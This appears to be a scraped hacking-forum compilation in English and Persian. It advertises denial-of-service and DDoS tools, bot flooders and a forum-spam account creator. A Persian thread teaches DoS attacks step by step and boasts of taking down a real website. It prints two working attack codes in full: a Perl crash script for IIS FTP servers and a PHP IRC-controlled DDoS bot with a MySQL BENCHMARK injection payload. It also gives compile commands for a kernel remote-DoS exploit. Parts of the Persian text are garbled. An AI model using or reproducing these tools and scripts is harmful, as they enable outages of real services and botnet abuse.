Spybot is meant to be used for legal purposes only. Since it is beyond the author's control of what Spybot is used for, the author of Spybot can not be held accountable for anything you do with this source. added by Asus

A bot flooder with alot of features and alot of mod to add. Check the page out for new mods

This is a small program, which let you kill all TCP traffic on a LAN network. It just sniffs for packets, gets SEQ/ACK numbers and send back spoofed RST packets. Really efficacious...

Simple patch to fix the overflow found in atftpd by Rick Patel added by Radost

Flood a target computer with ping packets.

simple frontpage Denial of service attack (in perl)

Crashes the Windows 2000 SMTP service

Crashes the Microsoft FTP service

Crashes a NT System. Works also on Windows2000.

DDoSPing is a remote network scanner for the most common Distributed Denial of Service programs (often called Zombies by the press). These were the programs responsible for the recent rash of attacks on high profile web sites. This tool will (hopefully!) detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings although configuration of each program type is possible from the tool\'s configuartion screen. Scanning is performed by sending the appropriate UDP and ICMP messages at a controlable rate to a user defined range of addresses.

In response to a number of recent distributed denial-of-service (DDOS) attacks that have been reported, the National Infrastructure Proctection Center (NIPC) Special Technology Applications Unit (STAU) has developed a tool to assist in combating this threat. The tool (called \"find_ddos\") is intended to scan a local system that is either known or suspected to contain a DDOS program. It is capable of scanning executing processes on Solaris 2.6 or later, and of scanning local files on a Solaris 2.x (or later) system.

Tfn2kpass allows recovery of the tfn2k password from recovered tfn2k binaries. Recovers from Intel-based Unix and Sun binaries.

RID (remote intrusion detector) is a tool programmed in C that is a highly configurable packet snooper and generator. It works by sending out packets defined in the config.txt file, then listening for appropriate replies

Extract mnuke32.zip File with WinZip , Enjoy IT !

A beginner tutorial on DoS attakcs. added by NrAziz

#!/usr/bin/perl
# Author: Nelson Bunker - Critical Watch
# [Only registered and activated users can see links]
#
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026
# Tested against several servers. Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [[Only registered and activated users can see links]]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_################# ####


use Net::FTP;

$wildcard='*************************************** ** ************************************************** **************';

if (not $ARGV[0]) {

print qq~

Usage: wildcard_dos.pl <host>

~;

exit;}


$IPaddress= $ARGV[0];


$SIG {'PIPE'} = FoundIt;

# create new FTP connection w/30 second timeout
$ftp = Net::FTP->new($IPaddress, Timeout => 5);

if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}

if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on $IPaddress is unacceptable";}

$bogus = $ftp->ls($wildcard);


sub FoundIt
{
print "This machine \($IPaddress\) is affected\n";
exit(0);

}

Demonstration of Distributed Reflection Denial of Service attacks

Paper on all kinds of DoS attacks, IPsec, new protocols and more

Deutscher Text der DDoS Angriffsm�glichkeiten mittels TFN2k, Ausblick der technischen M�glichkeiten mit TFN3k. Funktionsweise, Gegenma�nahmen und mehr. Homepage added by ~ShAKaL~

The UNICODE exploit has been around for a while and i thought i would have a bit of a play with it. To my surprise i found a denial of service attack, and it is far to simple to tell u here how to do it so if you were looking for it u came to the wrong place. I wrote this tutorial so you can understand the UNICODE exploit. There are quite a few docs on the unicode exploit i hope this gives u a bit more info. This is my first tutorial i hope it makes sense... i am pretty mashed so i will try not to make too many typo\'s.

This is a Tutorial from Steve Gibson why Windows XP will be the Denial of Service Exploitation Tool of choice for Internet Hackers Everywhere.

The Anatomy of a Distributed Denial of Service Attack

This document is a starter of a series of documents about some sort of subjects, which require great attention and involve pretty much detail; and aims to explain and clarify the very basic vulnerability type, namely local buffer overflows, and document the way to write exploits making use of such vulnerabilities.

This paper details buffer overflows in Windows NT. It includes full source code to the examples and source for the tools used.

Flood other computers whith netsend messages. added by Gr3v3

A device receiving specifically crafted IPv4 packets will force the inbound interface to stop processing traffic. Homepage added by rOOtless

Description:
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results because of incorrect handling of malformed messages.
By sending a malformed messages to DCOM __RemoteGetClassObject interface,The RPC Service will be crashed,and all service and application depending on RPC service will be abnormal.
If attacker have an account ,he can hijack epmapper pipe and 135 port Privilege Escalation after RPC service is crash. Homepage added by private3ms

A small but effective automated DoS program. Works well on small web servers. Supported OS: XP/ME/NT/2000 Credits to: Jack & Rammstein Homepage added by Radost

Covers a vulnerability commonly found in the wild: the stack overflow. Particularly discussed are all the details and steps taken into account, demonstrating that it is possible to inject arbitrary machine code in any running process, making use of stack overflow errors. Homepage added by Radost

The purpose of this paper is to prove that it is possible to remotely exploit hostile enviroments without having any idea of what the server-side software sources are. Homepage added by Radost

Here is how... in Persian

Fragmented TCP Syn-Packet Attack. Can completely halt Win2k Systems in local Networks, Firewalls dont matter. Customizable Colors of amOkk - Console GUI. added by Radost

Blast version 2.0


Blast is a small, quick TCP service stress test tool that does a large amount of work very quickly and can help spot potential weaknesses in your network servers.

DDosPing
--------

DDoSPing is a remote network scanner for the most common Distributed Denial
of Service programs (often called Zombies by the press). These were the programs
responsible for the recent rash of attacks on high profile web sites.

This tool will (hopefully!) detect Trinoo, Stacheldraht and Tribe Flood Network
programs running with their default settings, although configuration of each program
type is possible from the tool's configuartion screen. Scanning is performed by
sending the appropriate UDP and ICMP messages at a controlable rate to a user defined
range of addresses.

UDPFlood 2.00
-------------

UDPFlood is UDP packet sender. It sends out UDP packets to the specfied IP and port at a controllable rate. Packets can be made from a typed text string, a given number of random bytes or data from a file. Useful for server testing.

CraZy DoS - This tool will preform DoS attacks against two IP's of your choice. It is only to be used for Windows Xp! If you use it on Other Operating Systems Like 9x it will crash your system! Only Windows 2000 and up can use this program! It does work and if you want to kick a 56k Modem Connection offline just enter there IPs and set back and releax!

Aix433noflag.c exploits a weakness in a function in the AIX kernel which handles the in/outgoing network connection. Setting no flags in the TCP header, causes a 100% CPU usage (DoS). Tested On IBM RS6000/SMP-M80/4) on AIX 4.3.3 , Enjoy IT !

This Program is written in delphi 7. With Lan Message Flooder u can (net send) flood poeple(Z) 1000 of messages at once u can even change the source so it looks like someone else send it. Credits to: -[BeF]-Best Elite Forces . Enjoy IT !

Extract Dos Attack.zip with WinZip and then Read this Word , Enjoy IT !

Vulnerable systems:
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Server 5.0

ASM Source

Port of the jolt2 denial of service attack to Windows XP , Enjoy IT !

jolt2.c exploits the recent "IP Fragment Reassembly" Windows remote denial of service vulnerability described in ms00-029. Tested against Win98, WinNT4/SP5,6, Win2K from linux. Allows the user to specify UDP or ICMP and send a spoofed source address. Linux and Windows binaries available here , Enjoy IT !

Stacheldraht is a DDOS tool with a UDP-flood, TCP-SYN-flood, ICMP-Echo-Request and ICMP-Broadcast-Storm(smurf) attack and can spoof the IP.The master is password protected and the communication is encrypted. This tool was used for the attack to CNN, Yahoo... on Februar 2000. enjoy IT !

Trible Flood Network 2000 (TFN2k) is a DDOS tool with a UDP-flood, TCP-SYN-flood, ICMP-Echo-Request and ICMP-Broadcast-Storm(smurf) attack.It can spoof the IP. The communication between the parts are CAST-256 encrypted. Enjoy IT !

DDOS-tool with a UDP-flood-attack. The communication between master and agent(attacker) are over TCP with a high portnumber. The communication between master and daemon are over UDP. The master and daemon are password protected and the portnumbers are easy to change. Enjoy IT !

<p class="MsoNormal" dir="RTL" style="text-align: right; text-autospace: none; direction: rtl; unicode-bidi: embed">
��� ��ی �ی��ی �� ���ی ���� �� ����� Winnuke���� ����
�� ����� ���?ی �� ����� ��ی� ی� ���� ���� � ?ی����� �� �� ��� �ی� ��� �� ��ی�� ?��� ��ی ��� �ی ������� ��Block ��ی� � ���� �� ����ی� . �� ���� �ی� �ی ����ی� �� ������ ��یی �ی� �� ���ی ���� �� ����� Winnuke ����� ��� ��� ������� ��ی� � ی�ی �� ����ی� ������ �� ���ی �ی� ��� NukeNabber ��� �� ��� �� ��� � �ی��� ��� �� �� ����� ���� ���ی Winnuke ������ �ی ��� � ��?�ی� ?��� ��ی �ی��� ��Monitor �ی ��� � ?��� ��یی �� �� ����� Winnuke � ��� ��ی �ی?� Dos ��ی� ?�ی� ����� �� �����یی ���� � �� ����� ��� �ی ����� � �� ������ی� � ����ی� ��� ������ �� �ی��� ��� �ی� ������ ����IP ���ی �� �� ����� ���� ��یی ��� ���� ��� �� �ی��� ��� �� �����Log �ی ��� � �?� ���� ���ی ���� ����� ���� ?��� � �� �ی� ��� ����� �ی� �ی� ����ی� ���� ?ی�� ���� �� ��� ���� ����� �ی ��� .
����� ����ی��

UDPer is a logic bomb written in ASM for Windows which floods a victim with packets at a certain date , Enjoy IT!

Demonstration of Distributed Reflection Denial of Service attacks. Enjoy IT!

Trend Micro Officescan Denial of Service" (TMOSDOS for Windows; compiled win32-exe and the Visual Basic source) is an optimized tool for the issue explained on [Only registered and activated users can see links] - All advisories describe that a denial of service attack is possible during sending random data or open more than five connections to the target port. TMOSDOS opens just one tcp connection, sends just seven characters ("get / ") to the target and closes after a few seconds the connection: Thats more effective than the old methods. Enjoy IT!

Half-Life server versions 1.1.1.0 and below (including all MODs based on the game, such as Counter-Strike and DoD) remote exploit that will cause a denial of service And You Can Execute Commands On Sum Vulnrable Machines ,, Enjoy ;D Note: It Works On WIndows And Have The .c File For Linux Too :) Use cmd For Windows , Enjoy IT!

New and improved version of smurf 2k, previous version's bug are fixed and this should packet better (at least when i tried it i noticed a big difference from 1.1). have fun. Enjoy IT!

Crashes a NT System and works also on windows2000 , Enjoy IT!

This is a Icmp Packets sender. It will basically use icmp to preform DoS attacks on the host. This is a Awesome Tool! Works good no errors in code. Enjoy IT!

improved version of nemesy 1.0 - bugs fixed - this program generate random packets (protocol,port,etc...) of course the source ip is spoofed (random progressive generation)... so dont worry packet as much u want. Enjoy IT!

Nukeit V1.0 by [Only registered and activated users can see links]. A real fast nuker(DoS-tool) completely written in assembly laguage. Nuke it! allows you to hide your identity by spoofing your IP address (this feature is available only on Win2K). Also, you can pause your nuke so that you can check if your victim is still there; otherwise, you can resume just right where you left. With Nuke it! you can instantly quit your nuke at any time, at any state (non-blocking). Enjoy IT!

flood windows systems with messages . Enjoy IT!

Category: Tools -> IRC -> Bomber

An mIRC flooder script, you can use proxies or use your real ip to load the bots. Enjoy!

inam toosle ddos
behtarin kar bara apache
agent opera 3.6 va run 800 hast
va bara iis agent ie 5.5

Category: Tools -> DoS_/_DDoS -> Flooder

Ok Hi guys this Program allows you to reg. thousands of accounts on a phpBB Board in just a few minutes...... You just have to put in the host, the path to the phpbb forum, the username and pw, set the email adress if you want and klick on start. easy isnt it?? ;D have fun...This Prorgramm was Made by RadiantiX - Enjoy!

Distributed denial of service (DDoS) attacks aim to disrupt the service of information systems by overwhelming the processing capacity of systems or by flooding the network bandwidth of the targeted business. Recently, these attacks have been used to deny service to commercial web sites that rely on a constant Internet presence for their business. The attacks differ from traditional DDoS attacks in the targeted nature and shear number of attacking hosts
Enjoy

Remote proof of concept denial of service exploit that makes use of a flaw in the Unreal game engine where a simple UDP packet with a long value can overwrite important memory zones. Vulnerable games include: DeusEx versions below and equal to 1.112fm, Devastation versions below and equal to 390, Mobile Forces versions below and equal to 20000, Nerf Arena Blast versions below and equal to 1.2, Postal 2 versions below and equal to 1337, Rune versions below and equal to 107, Tactical Ops versions below and equal to 3.4.0, TNN Pro Hunter...
Homepage ([Only registered and activated users can see links])
Enjoy

همه چيز در مورد Dos كه به دردتون مي خوره

DoS/DDoS attacks are a virulent, relatively new type of Internet attacks, they have caused some biggest web sites on the world -- owned by the most famous E-Commerce companies such as Yahoo, eBay, Amazon -- became inaccessible to customers, partners, and users, the financial losses are very huge.

For defensing against the DDoS attacks, the network engineers have made many attempts to design the systems that help identify the machines of lunching DDoS attacks and stop the malicious attacks. The systems are deployed at three administrative network domains: victim network, intermediate network and source network. In this paper, I will take an overview for the three administrative domains; compare and analyze the potential abilities of the systems for detecting and defensing the DDoS attacks, when the systems are deployed on each kind of the administrative network domain.

It is easy to understand that the DDoS attacks should be stopped as close as possible the source of the attacks, that will save the network resources and reduce the traffic congestion, so I also discuss the D-WARD, or DDoS Network Attack Recognition and Defense, it is an important DDoS defense system deployed at the source network.
...

This paper attempts a comprehensive scoping of the DDoS problem. We propose new taxonomies to categorize DDoS attack networks, to classify the different techniques used in a DDoS attack, and to describe the characteristics of the software tools used in setting up a DDoS attack network. These taxonomies help us to understand the similarities and differences in DDoS attacks and tools, and the scope of the DDoS problem. Given this new understanding, we propose classes of countermeasures that target the DDoS problem before, during and after an actual DDoS attack. This work is intended to stimulate research into creative, effective and efficient defenses and detection mechanisms for DDoS attacks, and to assist in creating comprehensive solutions that will provide a more generalized and effective approach to countering both known and derivative DDoS attacks.

October 25, 2004
مقاله: بررسی حملات DOS

نویسنده : نیما مجیدی
شاید بیشتر مدیران شبکه ها و علاقه مندان به امنیت اسم
حملاتی موسوم به DOS را در سال های اخیر شنیده باشند . اما بیشتر آنها ندانند DOS
چگونه عمل می کند و پیامدهای ناشی از این حمله چیست ؟ گروهی نیز ت�?کرات نادرسی از
حملات DOS در ذهن دارند و �?کر می کنند که می توان با است�?اده از یک دیوار آتش
نرا�?زاری یا برنامه هایی دیگر از این قبیل با حملات DOS و DDOS مقابله کرد و جلوی
آن را گر�?ت ....

سلام اينم برای DOS کردن اين 2 تا windows.

با سلام
اول کرنل سرورتونو آپگرید کنید
Mod_evasive | eth0.us - Server admin info for cPanel, plesk, ensim and linux! ([Only registered and activated users can see links])
فایلی که توی این صفحه هست را روی سرورتون توی جایی که گفته شده نصب کنید

سرور رو خاموش و روشن کنید

کار تمومه !

99 درصد در برابر حملات نرم افزاری دیداس سرور شما مقاوم است


موفق باشید ...

DDoS Attack Tool ~ DoS v5.0

I don't doubt you've heard of this application before. It's one of the only ddos tools that work, and allows proxys to be used.




download link
[Only registered and activated users can see links]

screen shot's for this program
[Only registered and activated users can see links]


enjoy :x




.

<?php
$irc_server = "yourserver";
$irc_port = "6667";

$channel = "#ddos";
$channel_pass = "ddos";

$nick = "LudiX-".time();
$reg_con = "$nick \"localhost\" \"$irc_server\" :fr0z3n";

##########################
## END OF CONFIGURATION ##
##########################

$irc_socket = fsockopen($irc_server, $irc_port);
$dd0s = 0;
$dozzed = 1;
if(!$irc_socket)
{
print "[-] Could not connect to $irc_server\n[!] Check your config!";
exit;
}
print "[x] Connected to $irc_server\n";


fputs($irc_socket, "USER $reg_con\r\n");
fputs($irc_socket, "nick $nick\r\n");


while(!feof($irc_socket))
{
$buffer = fgets($irc_socket);
#print $buffer;
if(preg_match("[^PING (.*)]", $buffer, $analyse))
{
fputs($irc_socket, "PONG $analyse[1]");
}


if(preg_match("[376 $nick :End of /MOTD]", $buffer))
{
print "[x] End of /MOTD command.\n[x] Joining $channel\r\n";
fputs($irc_socket, "join $channel $channel_pass\n");
}


if(preg_match("[.*PRIVMSG .* :!ddos\[RUN\] (.*)\ -i (.*) -t (.*)]", $buffer, $dat))
{
$host = $dat[1];
$x = $dat[2];
$threads = trim($dat[3]);
$host = str_replace("ddos", "BENCHMARK(100000000000,BENCHMARK(99999999999999999 9999,sha1(1)))", $host);

preg_match("[([Only registered and activated users can see links]*\.php).*]", $host, $print);
fputs($irc_socket, "PRIVMSG $channel :STARTING DDOS for $x times with $threads threads [".$print[1]."]\r\n");
print $host;
$dd0s = 1;
}


if($dozzed == $x)
{
$dd0s = 0;
$dozzed = 1;
$x = 0;
$threads = 1;
fputs($irc_socket, "PRIVMSG $channel :FINISHED DDOS\r\n");
}

if($dd0s == 1)
{
ddos($host, $threads, $irc_socket, $channel);
++$dozzed;
}

}


function ddos($host, $x, $irc_socket, $channel)
{

$i = 0;
$mh = curl_multi_init();
while($i < $x)
{
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, "$host");
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 20);
curl_setopt($ch[$i], CURLOPT_MUTE, TRUE);
curl_multi_add_handle($mh,$ch[$i]);
++$i;
}
$running=null;
do {
$eater = curl_multi_exec($mh,$running);
} while($running > 0);

$i = 0;
while($i < $x)
{
curl_multi_remove_handle($mh,$ch[$i]);
++$i;
}
curl_multi_close($mh);
}

?>

DoS 5 1 .5 Final

عكس:

[Only registered and activated users can see links]

دانلود::

[Only registered and activated users can see links]
[Only registered and activated users can see links]

Floo نام ابزاری جهت حمله از روش DoS هست. البته باید سرعت اینترنت خوبی داشته باشید .

پلتفرم : ویندوز / لینوکس

Screen Shot :

[Only registered and activated users can see links]

Download::

[Only registered and activated users can see links]

Floo نام ابزاری جهت حمله از روش DoS هست. البته باید سرعت اینترنت خوبی داشته باشید .

پلتفرم : ویندوز / لینوکس

Screen Shot :

[Only registered and activated users can see links]

Download::

[Only registered and activated users can see links]

عکسی گذاشتی یک برنامه ویژوال است فایلی دانلود میکنیم یک tools پرل است lo1ad

با سلام خدمت دوستان با یک پست خفن که جلو تر هم بریم خفن تر هم میشه در خدمت شما هستیم

اموزش قدم به قدم حمله های DOS که ملت تو کفش هستن:o

در این سلسله اموزش ها من انواع مدل های حملات تکذیب سرویس یا DOS و DDOS رو برای شما با تاریخچه و چگونگی انجام گرفتن َ(یعنی توضیح کامل ) میدم که دیگه حال کنید

پرایویت تو این تاپیک نداریم (یعنی دل روده هرچی پرایویت هست میخوام بریزم بیرون اینجا);;)

خوب هرکی موافق هست دکمه تشکر هرکی مخالف این دکمه گوشه که تابلو قرمز هست رو بزنه

اساتید مخصوصا اقا مرتضی واقعا میگم ببخشید دیگه ;;)

لطفا اینجا پست ندید که کنار هم اموزش خوبی داشته باشیم به دور از اسپم این حرفا (پاک میشه پست های بی خودی)

سوال نکنید چون قدم به قدم که برم جلو خود به خود به جواب خودتون میرسید پس عجله نکنید
ابزار مورد نیاز یا فیلم هم خودم براتون اپلود میکنم

خوشبختانه یه بدبختانه تو انجمن های فارسی زبان در باره این موضوع حملات تکذیب سرویس نمی پردازن
و همین باعث شده بیشتر افراد فکر کنن این حملات خیلی سخت و یا اصلا نشدنی هست
ولی این طور نیست بیشتر کسایی که از حملات تکذیب سرویس استفاده میکنن فقط از یک روش برای این کار استفاده می کنن که هم قوی هست
و هم اسان که بعدا کامل توضیح میدم با فیلم اموزشی

حالا اصلا این حملات تکذیب سرویس چیه؟
این برای تازه وارد ها
این حملات معمولا برای از کار انداختن یک سرویس دهنده استفاده میشه مثلا یک سرور
بر خلاف اینکه همه میگن نمی دونم پهنا باند رو پر کنن این فقط یک روشه روش های زیاد داره حملات تکذیب سرویس که نام می بریم و توضیح میدهیم

این نوع حملات هم یا به صورت لوکال هست یا ریموت
حالا اگر باز چیزی لازم بود بیشتر توضیح میدم

دیدم به صورت pdf بزارم بهتر هست

در این درس با روش DOS ولی به صورت لوکال اشنا می شوید :o
برای اطلاعات عمومی هم شده دانلود کنید

سلام دوست عزیز(البته من از ایشون اجازه گرفتم که پست بدم) ، تایپیک خوبی داره می شه ، ادامه بده که بی صبرانه در انتظار پستهای بعدیتم...
یک سوال داشتم ...من دارم با Ruby کار می کنم...و یکی از اسکریپتهایی که با زبان perl نوشته شده بود ، برای کسب تجربه ، با Ruby نوشتم ...و تصمیم دارم که بازهم اسکریپت بنویسم برای این نوع حملات . آیا Ruby برای اینکار خوب هست یا نه...؟

ممنون از لطفت. :x

سلام دوست عزیز(البته من از ایشون اجازه گرفتم که پست بدم) ، تایپیک خوبی داره می شه ، ادامه بده که بی صبرانه در انتظار پستهای بعدیتم...
یک سوال داشتم ...من دارم با Ruby کار می کنم...و یکی از اسکریپتهایی که با زبان perl نوشته شده بود ، برای کسب تجربه ، با Ruby نوشتم ...و تصمیم دارم که بازهم اسکریپت بنویسم برای این نوع حملات . آیا Ruby برای اینکار خوب هست یا نه...؟

ممنون از لطفت. :x

راستش خوبه ولی یک مشکلی هست ....

مشکل اینه که شما هیچ وقت نمی تونی (تو ایران ) از سیستم خودت یک سرور رو DOS کنی و Down کنی برای مشکل هایی که شما بهتر خبر دارید

perl چرا خوبه چون رو تمام سرور ها نصب هست ولی Ruby شاید رو سرور نصب نباشه و اون وقته که اسکریپ روبی به درد نمی خوره و کارایی نداره
ولی برای اینکه یک تجربه به دست بیاری شما برنامه رو برای خودت بنویس تا با روش برنامه نویسی سوکت ها تو Ruby اشنا بشی

لطفا سوال دارید اینجا نپرسید

سلام
ببخشید دیر اپ کردم چنتا پروژه سنگین دارم + دانشگاه هم راهش دور هست باید برم خوابگاه
باید یک PDA بگیرم اگه کسی چیزه خوب و ارزان میشناسه (ویندوز موبایل روش نصب باشه پ.خ)
سیم کارت هم بخوره خیلی خوبه heart
---

خوب درس امروز درباره روشی از حملات داس یعنی متد ping هست که خیلی ها براشون سوال بود
حالا کامل من اینجا توضیح دادم

دوستان ببخشید چون در بحث dos یک سری چیز ها پرایویت هست همه رو نمی تونم بگم
برای همین بعضی سوال هارو نمی تونم جواب بدم

ولی باز اگه سوال بود یا پ.خ یا یاهو در خدمت هستم

سلام
بچه ها خوبه ادامه بدم ...؟
من که تشکری یا نظری ندیدم...؟

اگه نظری بود پ.خ لطفا

------------
خوب امروز یک روش به نام jolt2 رو برای شما معرفی کردم + اکسپلویت thumbsup

دانلود کنید برای اطلاعات شما دوستان خوبه

به نظرم مقاله ها باب میل بوده thumbsup

از تشکر ها معلومه
اگه همیشه این طوری باشه من زود به زود و بهتر با قوت قلب بالا ادامه می دم

تشکر
----------
خوب امروز درباره حملات Smurf صحبت می کنم
امید وارم این هم خوب شده باشه

خوب
شرمنده اگه دیر شد
-----

حملات شیرین و خفن SYN که خیلی جالب و زیرکانه هست

پیشنهاد میکنم این مقاله رو مطالعه کنید دوستانnaughty

سلام ببخشید دیر میشه دیگه از این به بعد سریع تر اپدیت می کنم
----

تمام لینک ها تست شد درست کار می کنه تعداد دانلود هارو نگاه کنید معلوم هست

----

بفرمایید این هم خوبه ولی خودم زیاد راضی نشدم چون منبع درباره این حمله کم بود
چیز خواصی پیدا نکردم و از اطلاعات خودم استفاده مردم دیگه شما ببخشید...:x

سلام

در این بخش با حمله distributed اشنا می شوید که برای حمله های خود از
زامبی استفاده می کنه :o

یکی از جالب ترین قسمت های DOS هست
پیشنهاد می کنم دانلود کنید thumbsup

و اما بعد از چند درس کار ما از حالت نوشته و تئوری میاد بیرون
از امروز قراره دیگه جای کتاب برای شما فیلم و ابزار بزارم

تقریبان میشه گفت روش های dos همین ها هستن که بالا گفتم
از این به بعد برای کارهای عملی اماده میشیم

از این پست من به بعد سوال کردن در این تاپیک ازاد هست و بنده جواب شمارو میدم

ولی اگه نظری دارید پ خ لطفا

سلام بچه ها
خوب هستید

امروز براتون یک فیلم اموزشی از ارشیوم در اوردم که با یک اسکریپت SYN میاد و یک جایی رو DOS میکنه نوشتن این اسکریپ ها زیاد سخت نیست

در این فیلم از اسکریپی استفاده شده به زبان perl که یکی از بچه های
گل اشیانه (صادق) نوشته

حالا فیلم رو ببینید جالبه (البته بگم شاید شما به دلایلی نتونید این کار رو انجام بدید)

فعلا:x

سلام اينم يك
اسكريپت خفن به زبان پرل كه ميشه با استفاده از باگي كه در نسخه 3.6.3 و همه نسخه هاي ديگر (البته تو يوزيج برنامه نوشته)
انجمن ويبولتون رو داس كنه و از دست رس خارج كنه

همين طور اين اسكريپ از باگي استفاده مي كنه كه در فايل search.php وجود داره
و به گفته نويسنده در 98% سرور ها كار ميكنه و از هر 15 تا سرور 13 تارو زده

حالا شما تست كنيد

------------ > راستي دوستان به نظر شما خوبه ادامه بدم ..؟ heart
اگه سوالي هست بپرسيد

سلام بچه ها
اینم یک اسکریپ به زبان perl که برای سیستم انجمن دهی mybb هست که
با استفاده از مشکل امنیتی که در قسمت search این انجمن هست
باعث از کار افتادن انجمن میشه

تست شده و کاملا کار میکنه

DDoS Tools

Link Downlod
[Only registered and activated users can see links]
[Only registered and activated users can see links]

سلام

امروز هم یک اسکریپ خفن dos که به زبان پرل نوشته شده
این اسکریپ با استفاده از مشکلی که در mod_dav سیستم اپاچی وجود داره
کار خود را انجام میده
جالبه
به سورسش نگاه کنید

اينم اسكريپي به زبان پرل كه براي حمله از روش flood استفاده ميكنهlo1ad

داراي كد نويسي ساده اي هست
پيشنهاد من اينه كه دانلود كنيد و از سورسش استفاده كنيد و برنامه هاي قوي تري بنويسيد


(سعي ميكنم فيلم اموزشي هم بزارم از اين به بعد )heart

سلام به همه

اینم یه برنامه واسه DDOS با عکس محیط برنامه

thumbsup

سلام
امروز برای شما از ارشیوم یک فیلم اوردم که صورت عملی ببینید که چه طوری یک سرور رو دان می کنن فیلم جالب و ساده ای هست
در این روش از حمله از مدل syn attack استفاده میشه
و طرف با 3 سرور یک سرور رو دان میکنه
جالبه
به سادگی میشه این کارو کرد کار سختی نیست

------------------
ببینم خیلی دارم بد میرم که دیگه نظر نمی دید یا تشکر نمی کنید خوبه ادامه بدم یا نه ( به نفع هست ادامه بدم چون داریم به جاهای داغ می رسیم) thumbsup

سلام

خوب گفتم چنتا سوال جواب بدم
دوستان سوال های خودشون رو تو پ خ از من میپرسن (من گفتم همین جا هم می تونید بپرسید )

من فقط جواب میدم که زیاد طولانی نشه

1- برای اجرا اسکریپت ها حتمی باید از برنامه ActivePerl استفاده کنی چون اسکریپ ها به زبان پرل هستن معمولا



2-برای dos کردن مهم نیست شما روت باشید ولی خوب روت بودن روی سرور ممکنه باعث بشه کار شما بهتر جلو بره برای dos کردن حد اقل روی سرور که ازش شل دارید باید اجازه run کردن command رو داشته باشید


فعلا همین ها بود اگه سوال بود یا پ خ کنید یا همین جا بپرسید heart

سلام
یک اسکریپ کار درست به زبان پرل خیلی کامل
تا الان این چنتا اسکریپی که معرفی کردم برای یک cms خواص بود ولی این
برای چندید cms هست و ...
بهتره دانلود کنید و یوزیج برنامه رو ببینید

اسکریپ قوی و توپ ihs که برای تیم ihsteam
هست
به زبان پرل هست و یک مدل های پرایویت هست

در ضمن فیلم اموزشیش هم ساختم براتون اپلود می کنم
که ببینید چه طوری خیلی ساده یک سایت رو dos کنید

ُسلام امروز میخوام یکی از بهترین پست هامو بدم
با هم تو این فیلم یک حمله dos رو انجام میدیم به صورت واقعی و سایت یک گروه خواننده رو دان می کنیم

کاملا قدم به قدم وساده هست و در این حال قوی و کار بردی

خیلی جالبه واقعا نباید این روش هارو من اینجا بگم (خوب یه کم پرایویت هست و خطر ناک )
ولی خوب دیگه چی کارش کنیم heart:o

بعد از انجام حمله شايد خواستيد مثلا حمله متوقف كنيد خوب بايد چي كار كنيم :
بايد pid رو داشته باشيم و پروسه رو kill كنيم خوب
ولي راه ساده تر.......
تو بيشتر شلرها قسمتي هست به نام proc كه مي تونيد پروسه هايي كه تو سرور در حال اجرا هست رو ببينيد
خوب بريد اون قسمت و پروسه مد نظر رو kill كنيد و تموم
البته دقت كنيد موقعي كه شروع به حمله مي كنيد چون به سرور فشار مياد ممكنه اين صفحه رو دير باز كنهheart

سلام
امروز براتون یک اسکریپ جالب اوردم که روی سیستم انجمن ساز smf کار می کنه
این اسکریپ با همه اسکریپت های که تا الان اینجا اپلود کردم فرق داره و میشه گفت یک نوع botnet هست
این اسکریپت روی همه ورژن ها کار نمی کنه
خوب اگه پرل بلد باشید (که حتمی باید بلد باشید ) بعد از دیدن سورس این برنامه متوجه میشید که اصلا این اسکریپ نمیاد مثلا پکت بفرسته برای انجمن و از این کار ها
به جاش میاد شروع می کنه در انجمنی که شما بهش ادرس دادیدی به تعداد دل خواه یوزر میسازه
همون حمله اسپمر ها که بعضی از شما ها شاید دیده باشید naughty

(کسایی که پرل بلدن این سورس رو نگاه کنن براشون جالبه )

اسکریپت اپن سورس برای محافظت از حملات ddos

Installation

wget [Only registered and activated users can see links]
chmod 0700 install.sh
./install.sh

Uninstalling

wget [Only registered and activated users can see links]
chmod 0700 uninstall.ddos
./uninstall.ddos

سلام
براتون این دفعه برنامه ای اوردم که به زبان C هست
این برنامه 2 تا کار انجام میده
1- برنامه dos است که میاد با روش خودش به پورت مورد نظر کانکت می کنه و پورت رو مشغول می کنه
2- پورت اسکنر

چون این برنامه به زبان C هست و میشه گفت دارای سورس ساده ای هست
کسایی که دوست دارن درباره سوکت نویسی در C و نوشتن برنامه DOS .در زبان C یاد بگیرن
پیشنهاد می کنم این سورس رو دانلود کنید

برای کامپایل هم این طوری عمل کنید

gcc mutilate -o mutilate.c

سلام
امروز Iframe attack. رو به شما معرفی می کنم
این نوع حملات به خودی خود و تنها کارایی نداره (البته نه همه جا)

در این نوع روش با قرار دادن کد حمله بر روی یک سرور (مثلا) و اجرای اون
اسکریپ حمله کننده شروع به دانلود (مثلا) از روی سرور قربانی و این باعث تموم شدن پهنای باند
هاست میشه ......

این فیلم هم در این زمینه خیلی کامله و دوست خوبم Nitrojen26 ساخته

پیشنهاد می کنم حتمی دانلود کنید ;;)

اینم یک باگ جدید (برای اخرای 2009)
که برای کرنل 2.6.30 هست و به صورت ریموت attack می کنه

این اکسپلویت به زبان C هست و برای کامپایل به این شکل عمل کنید

$ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
$ airmon-ng start wlan0

سلام امروز براتون یک چیز جدید اوردم
یک باگ که در همه مرورگر های اینترنتی وجود داره

انالیز :
این باگ در یک تابع در زبان جاوا اسکریپ هست به نام e.length (مثلا )
این تابع عدد میگیره چنان چه شما یک عدد اعشاری بزرگ بهش بدید باعث میشه
مرورگر شما اشتباه کنه و کرش کنه
خیلی جالبه حتمی ببینید تو این اسکریپت از هیچ حلقه ای استفاده نشده
همچنین چیز جالبه دیگه این هست که این باگ 9 ساله وجود داره ولی کسی متوجه نشده....!

این باگ رو این سیستم ها وجود داره


- Internet Explorer 5, 6, 7, 8 (all versions)
- Chrome (limited)
- Opera
- Seamonkey
- Midbrowser
- Netscape 6 & 8 (9 years ago)
- Konqueror (all versions)
- Apple iPhone + iPod
- Apple Safari
